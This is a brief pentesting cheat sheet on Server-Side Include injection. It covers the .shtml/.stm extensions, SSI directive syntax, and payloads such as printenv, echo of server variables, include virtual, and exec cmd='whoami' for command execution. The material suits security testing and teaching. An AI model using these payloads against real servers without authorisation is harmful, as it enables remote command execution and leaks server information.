Detections#

Typical file extensions include .shtml, .shtm, and .stm. If you get redirected to any of those, try basting with the payloads below

SSI Directives#

SSI utilizes directives to add dynamically generated content to a static HTML page. These directives consist of the following components:

• name: the directive’s name
• parameter name: one or more parameters
• value: one or more parameter values

An SSI directive has the following syntax:

<!--#name param1="value1" param2="value" -->

Exploits#

printenv prints environment variables. It does not take any variables.

<!--#printenv -->

config changes the SSI configuration by specifying corresponding parameters. For instance, it can be used to change the error message using the errmsg parameter:

<!--#config errmsg="Error!" -->

echo prints the value of any variable given in the var parameter. Multiple variables can be printed by specifying multiple var parameters. For instance, the following variables are supported:

• DOCUMENT_NAME: the current file’s name
• DOCUMENT_URI: the current file’s URI
• LAST_MODIFIED: timestamp of the last modification of the current file
• DATE_LOCAL: local server time

<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->

exec executes the command given in the cmd parameter:

<!--#exec cmd="whoami" -->

include includes the file specified in the virtual parameter. It only allows for the inclusion of files in the web root directory.

<!--#include virtual="index.html" -->